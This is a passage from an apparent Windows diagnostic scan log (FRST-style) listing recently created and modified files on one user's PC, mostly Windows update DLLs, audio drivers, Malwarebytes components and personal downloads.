    2017-01-13 15:55 - 2017-01-13 15:53 - 00341144 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00321712 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DHT64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00321712 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DAA64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00258864 _____ (TODO: <Company name>) C:\WINDOWS\system32\slprp64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00214832 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEED64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00166200 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSWOW64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00122320 _____ (Real Sound Lab SIA) C:\WINDOWS\system32\CONEQMSAPOGUILibrary.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00118592 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAR64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00112488 _____ (Conexant Systems, Inc.) C:\WINDOWS\system32\Caf64api.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00110984 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEL64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00088344 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEG64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00005604 _____ C:\WINDOWS\system32\cxapo.lncs
    2017-01-13 15:55 - 2017-01-13 15:53 - 00000736 _____ C:\WINDOWS\system32\cxapo.prop
    2017-01-11 23:08 - 2017-01-11 23:08 - 02604526 _____ C:\Users\Joseph\Downloads\AAS-L2-Student-Packet-Sample.pdf
    2017-01-11 22:56 - 2017-01-11 22:56 - 02399782 _____ C:\Users\Joseph\Downloads\AAS-L1-Student-Packet-Sample.pdf
    2017-01-11 22:55 - 2017-01-11 22:55 - 05323693 _____ C:\Users\Joseph\Downloads\AAR-L1-2ndEd-CobwebtheCat-Sample.pdf
    2017-01-11 15:10 - 2017-01-11 15:10 - 05432492 _____ C:\Users\Joseph\Downloads\01-08-2017.pdf
    2017-01-11 15:07 - 2017-01-11 15:07 - 00106459 _____ C:\Users\Joseph\Downloads\bill_10912246.pdf
    2017-01-10 22:58 - 2016-12-21 00:09 - 00263472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
    2017-01-10 22:58 - 2016-12-21 00:01 - 20969928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
    2017-01-10 22:58 - 2016-12-20 23:46 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
    2017-01-10 22:58 - 2016-12-20 23:43 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BlockedShutdown.dll
    2017-01-10 22:58 - 2016-12-20 23:41 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BioFeedback.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00318976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpencom.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncSettings.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
    2017-01-10 22:58 - 2016-12-20 23:39 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
    2017-01-10 22:58 - 2016-12-20 23:38 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Cred.dll
    2017-01-10 22:58 - 2016-12-20 23:34 - 07626752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
    2017-01-10 22:58 - 2016-12-20 23:30 - 05398016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aclui.dll
    2017-01-10 22:58 - 2016-12-20 23:30 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
    2017-01-10 22:58 - 2016-12-20 23:25 - 07469056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
    2017-01-10 22:58 - 2016-12-20 23:22 - 01883648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
    2017-01-10 22:58 - 2016-12-20 23:22 - 00860672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
    2017-01-10 22:58 - 2016-12-14 00:08 - 00341344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
    2017-01-10 22:58 - 2016-12-14 00:06 - 00509792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
    2017-01-10 22:58 - 2016-12-14 00:01 - 01557808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
    2017-01-10 22:58 - 2016-12-13 23:45 - 00147968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
    2017-01-10 22:58 - 2016-12-13 23:42 - 00167424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinSCard.dll
    2017-01-10 22:58 - 2016-12-13 23:36 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
    2017-01-10 22:58 - 2016-12-13 23:35 - 00712192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
    2017-01-10 22:58 - 2016-12-13 23:35 - 00553984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptui.dll
    2017-01-10 22:58 - 2016-12-13 23:22 - 02998272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
    2017-01-10 22:58 - 2016-12-13 23:22 - 02748416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpcore.dll
    2017-01-10 22:57 - 2016-12-21 00:59 - 00218976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinesam.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 03892864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01852720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01360464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01277344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01201872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 00980832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
    2017-01-10 22:57 - 2016-12-20 23:41 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
    2017-01-10 22:57 - 2016-12-20 23:39 - 01300480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
    2017-01-10 22:57 - 2016-12-20 23:35 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
    2017-01-10 22:57 - 2016-12-20 23:35 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
    2017-01-10 22:57 - 2016-12-20 23:33 - 19413504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
    2017-01-10 22:57 - 2016-12-20 23:32 - 19417600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
    2017-01-10 22:57 - 2016-12-20 23:27 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
    2017-01-10 22:57 - 2016-12-20 23:26 - 01155072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVP9DEC.dll
    2017-01-10 22:57 - 2016-12-20 23:25 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
    2017-01-10 22:57 - 2016-12-20 23:24 - 06044160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
    2017-01-10 22:57 - 2016-12-20 23:24 - 05061120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
    2017-01-10 22:57 - 2016-12-20 23:24 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
    2017-01-10 22:57 - 2016-12-20 23:24 - 00886272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
    2017-01-10 22:57 - 2016-12-14 00:21 - 02206496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll
    2017-01-10 22:57 - 2016-12-14 00:01 - 00382784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AUDIOKSE.dll
    2017-01-10 22:57 - 2016-12-14 00:01 - 00076984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\remoteaudioendpoint.dll
    2017-01-10 22:57 - 2016-12-13 23:46 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
    2017-01-10 22:57 - 2016-12-13 23:40 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
    2017-01-10 22:57 - 2016-12-13 23:40 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.UI.Logon.ProxyStub.dll
    2017-01-10 22:57 - 2016-12-13 23:38 - 13869056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
    2017-01-10 22:57 - 2016-12-13 23:38 - 00213504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.CredDialogController.dll
    2017-01-10 22:57 - 2016-12-13 23:35 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
    2017-01-10 22:57 - 2016-12-13 23:32 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3D12.dll
    2017-01-10 22:57 - 2016-12-13 23:32 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll
    2017-01-10 22:57 - 2016-11-02 07:01 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
    2017-01-10 22:57 - 2016-08-01 23:30 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
    2017-01-10 22:48 - 2016-12-21 02:49 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
    2017-01-10 22:47 - 2016-12-21 03:08 - 00136032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ImplatSetup.dll
    2017-01-10 22:47 - 2016-12-21 03:04 - 07816032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
    2017-01-10 22:47 - 2016-12-21 02:43 - 04130440 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
    2017-01-10 22:47 - 2016-12-21 02:43 - 01454504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll
    2017-01-10 22:47 - 2016-12-21 02:43 - 01071736 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
    2017-01-10 22:47 - 2016-12-21 02:43 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 22224480 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 01988560 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 01702392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 01300600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
    2017-01-10 22:47 - 2016-12-21 02:41 - 01600632 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
    2017-01-10 22:47 - 2016-12-21 02:14 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
    2017-01-10 22:47 - 2016-12-21 02:13 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCsp.dll
    2017-01-10 22:47 - 2016-12-21 02:12 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProvPluginEng.dll
    2017-01-10 22:47 - 2016-12-21 02:10 - 00234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCore.dll
    2017-01-10 22:47 - 2016-12-21 02:09 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneBackupHandler.dll
    2017-01-10 22:47 - 2016-12-21 02:09 - 00363520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BioFeedback.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 01292288 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpencom.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00289792 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeveloperOptionsSettingsHandlers.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
    2017-01-10 22:47 - 2016-12-21 02:07 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
    2017-01-10 22:47 - 2016-12-21 02:06 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
    2017-01-10 22:47 - 2016-12-21 02:06 - 00310784 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncSettings.dll
    2017-01-10 22:47 - 2016-12-21 02:06 - 00260608 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
    2017-01-10 22:47 - 2016-12-21 02:06 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
    2017-01-10 22:47 - 2016-12-21 02:05 - 00425984 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
    2017-01-10 22:47 - 2016-12-21 02:05 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
    2017-01-10 22:47 - 2016-12-21 02:01 - 09131008 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
    2017-01-10 22:47 - 2016-12-21 01:59 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
    2017-01-10 22:47 - 2016-12-21 01:56 - 00947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVP9DEC.dll
    2017-01-10 22:47 - 2016-12-21 01:56 - 00936960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
    2017-01-10 22:47 - 2016-12-21 01:55 - 08129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
    2017-01-10 22:47 - 2016-12-21 01:55 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
    2017-01-10 22:47 - 2016-12-21 01:53 - 06664192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
    2017-01-10 22:47 - 2016-12-21 01:51 - 08075776 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
    2017-01-10 22:47 - 2016-12-21 01:49 - 04149248 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
    2017-01-10 22:47 - 2016-12-21 01:49 - 02691072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
    2017-01-10 22:47 - 2016-12-21 01:49 - 01062912 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
    2017-01-10 22:47 - 2016-12-21 01:47 - 01121280 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
    2017-01-10 22:47 - 2016-12-14 00:34 - 02482280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
    2017-01-10 22:47 - 2016-12-14 00:23 - 00404832 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
    2017-01-10 22:47 - 2016-12-14 00:19 - 00584544 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
    2017-01-10 22:47 - 2016-12-14 00:17 - 00319288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
    2017-01-10 22:47 - 2016-12-14 00:14 - 01694712 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
    2017-01-10 22:47 - 2016-12-13 23:46 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
    2017-01-10 22:47 - 2016-12-13 23:43 - 00201728 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScDeviceEnum.dll
    2017-01-10 22:47 - 2016-12-13 23:42 - 00352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
    2017-01-10 22:47 - 2016-12-13 23:42 - 00236544 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSCard.dll
    2017-01-10 22:47 - 2016-12-13 23:40 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll
    2017-01-10 22:47 - 2016-12-13 23:39 - 00837632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
    2017-01-10 22:47 - 2016-12-13 23:39 - 00290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
    2017-01-10 22:47 - 2016-12-13 23:37 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
    2017-01-10 22:47 - 2016-12-13 23:36 - 01002496 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
    2017-01-10 22:47 - 2016-12-13 23:36 - 00539648 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
    2017-01-10 22:47 - 2016-12-13 23:26 - 00932864 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
    2017-01-10 22:47 - 2016-12-13 23:26 - 00869888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
    2017-01-10 22:47 - 2016-12-13 23:25 - 02009600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRHInproc.dll
    2017-01-10 22:47 - 2016-12-13 23:24 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
    2017-01-10 22:47 - 2016-12-13 23:23 - 03134976 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcore.dll
    2017-01-10 22:47 - 2016-12-13 23:22 - 02317824 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
    2017-01-10 22:47 - 2016-12-13 23:22 - 01513472 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
    2017-01-10 22:47 - 2016-12-13 23:22 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
    2017-01-10 22:47 - 2016-12-13 23:21 - 03616768 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
    2017-01-10 22:46 - 2016-12-21 03:08 - 00245600 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll
    2017-01-10 22:46 - 2016-12-21 02:46 - 00624048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
    2017-01-10 22:46 - 2016-12-21 02:42 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
    2017-01-10 22:46 - 2016-12-21 02:15 - 22563840 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
    2017-01-10 22:46 - 2016-12-21 02:05 - 00261632 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
    2017-01-10 22:46 - 2016-12-21 02:00 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcfg.dll
    2017-01-10 22:46 - 2016-12-21 01:59 - 00883712 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
    2017-01-10 22:46 - 2016-12-21 01:58 - 23678464 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
    2017-01-10 22:46 - 2016-12-21 01:57 - 00462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhsettingsprovider.dll
    2017-01-10 22:46 - 2016-12-21 01:53 - 04474368 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
    2017-01-10 22:46 - 2016-12-21 01:51 - 05611008 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
    2017-01-10 22:46 - 2016-12-21 01:50 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
    2017-01-10 22:46 - 2016-12-13 23:48 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
    2017-01-10 22:46 - 2016-12-13 23:42 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.UI.Logon.ProxyStub.dll
    2017-01-10 22:46 - 2016-12-13 23:41 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
    2017-01-10 22:46 - 2016-12-13 23:40 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
    2017-01-10 22:46 - 2016-12-13 23:40 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConsoleLogon.dll
    2017-01-10 22:46 - 2016-12-13 23:39 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.CredDialogController.dll
    2017-01-10 22:46 - 2016-12-13 23:38 - 17188864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
    2017-01-10 22:46 - 2016-12-13 23:35 - 00600576 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptui.dll
    2017-01-10 22:46 - 2016-12-13 23:24 - 01005568 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3D12.dll
    2017-01-10 22:46 - 2016-12-13 23:23 - 01231872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
    2017-01-10 22:46 - 2016-12-13 23:22 - 00707584 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
    2017-01-10 22:45 - 2016-12-21 02:37 - 00455520 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
    2017-01-10 22:45 - 2016-12-21 01:54 - 05511680 _____ (Microsoft Corporation) C:\WINDOWS\system32\aclui.dll
    2017-01-10 22:45 - 2016-12-21 01:53 - 01692672 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
    2017-01-10 22:45 - 2016-12-21 01:51 - 02275840 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
    2017-01-10 22:45 - 2016-12-14 00:41 - 01235296 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
    2017-01-10 22:45 - 2016-12-14 00:41 - 00590960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
    2017-01-10 22:45 - 2016-12-14 00:33 - 01356864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe
    2017-01-10 22:45 - 2016-12-14 00:18 - 00715104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
    2017-01-10 22:45 - 2016-12-14 00:18 - 00335712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
    2017-01-10 22:45 - 2016-12-14 00:14 - 00418952 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
    2017-01-10 22:45 - 2016-12-14 00:14 - 00089416 _____ (Microsoft Corporation) C:\WINDOWS\system32\remoteaudioendpoint.dll
    2017-01-10 22:45 - 2016-12-13 23:38 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
    2017-01-10 22:45 - 2016-11-02 06:00 - 00534096 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
    2017-01-10 22:45 - 2016-11-02 05:28 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
    2017-01-10 22:45 - 2016-11-02 05:22 - 00337920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
    2017-01-10 22:45 - 2016-11-02 05:21 - 00942080 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
    2017-01-10 17:38 - 2017-02-01 18:26 - 00176064 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
    2017-01-10 17:37 - 2017-02-02 10:10 - 00091584 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
    2017-01-10 17:37 - 2017-02-01 21:20 - 00110536 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
    2017-01-10 17:37 - 2017-01-31 23:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
    2017-01-10 17:37 - 2017-01-20 07:47 - 00077416 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
    2017-01-10 17:37 - 2017-01-10 17:37 - 00001919 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
    2017-01-10 17:37 - 2017-01-10 17:37 - 00000000 ____D C:\Program Files\Malwarebytes
    2017-01-10 08:16 - 2017-01-31 15:36 - 00000000 ____D C:\Users\Joseph\Desktop\Marina
    2017-01-08 19:56 - 2017-01-31 20:39 - 00000000 ___RD C:\Users\Joseph\Creative Cloud Files
    2017-01-08 19:53 - 2017-01-08 19:53 - 00000000 ____D C:\Users\Joseph\AppData\Local\CEF
    2017-01-08 19:49 - 2017-01-08 19:49 - 00804440 _____ (Adobe Systems Incorporated) C:\Users\Joseph\Downloads\CreativeCloudSet-Up (1).exe
    2017-01-06 16:13 - 2017-01-06 16:13 - 00000000 ____D C:\Program Files\Common Files\Intel
    2017-01-06 16:13 - 2017-01-06 16:13 - 00000000 ____D C:\Program Files (x86)\Cisco
    2017-01-04 16:04 - 2017-01-04 16:04 - 00313276 _____ C:\Users\Joseph\Downloads\reciept2.pdf
    2017-01-04 16:04 - 2017-01-04 16:04 - 00273789 _____ C:\Users\Joseph\Downloads\reciept1.pdf
    2017-01-03 19:19 - 2017-01-24 21:11 - 00000000 ____D C:\Users\Joseph\Desktop\Joe

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2017-02-02 11:45 - 2016-09-29 08:55 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
    2017-02-02 10:26 - 2016-07-16 06:45 - 00000000 ____D C:\WINDOWS\INF
    2017-02-02 10:08 - 2016-09-29 08:58 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
    2017-02-02 10:08 - 2016-09-22 19:41 - 00000000 __SHD C:\Users\Joseph\IntelGraphicsProfiles
    2017-02-01 23:59 - 2016-09-29 09:03 - 00000000 ____D C:\Users\Joseph
    2017-02-01 23:54 - 2016-09-23 17:44 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Skype
    2017-02-01 21:25 - 2016-07-16 01:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
    2017-02-01 21:19 - 2016-09-22 19:47 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
    2017-02-01 21:18 - 2016-09-29 09:24 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
    2017-02-01 21:18 - 2016-09-22 19:48 - 00251848 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
    2017-02-01 21:17 - 2016-07-16 01:04 - 00524288 _____ C:\WINDOWS\system32\config\BBI
    2017-02-01 20:58 - 2017-01-02 16:12 - 00093053 _____ C:\Users\Joseph\Desktop\Annual Budget - 2017.xlsx
    2017-02-01 19:33 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\NDF
    2017-02-01 17:43 - 2016-07-16 06:47 - 00000000 ___HD C:\Program Files\WindowsApps
    2017-02-01 17:43 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\AppReadiness
    2017-02-01 17:17 - 2016-09-29 09:03 - 01320142 _____ C:\WINDOWS\system32\PerfStringBackup.INI
    2017-02-01 08:53 - 2016-10-29 21:04 - 00000000 ____D C:\Users\Joseph\AppData\Local\Adobe
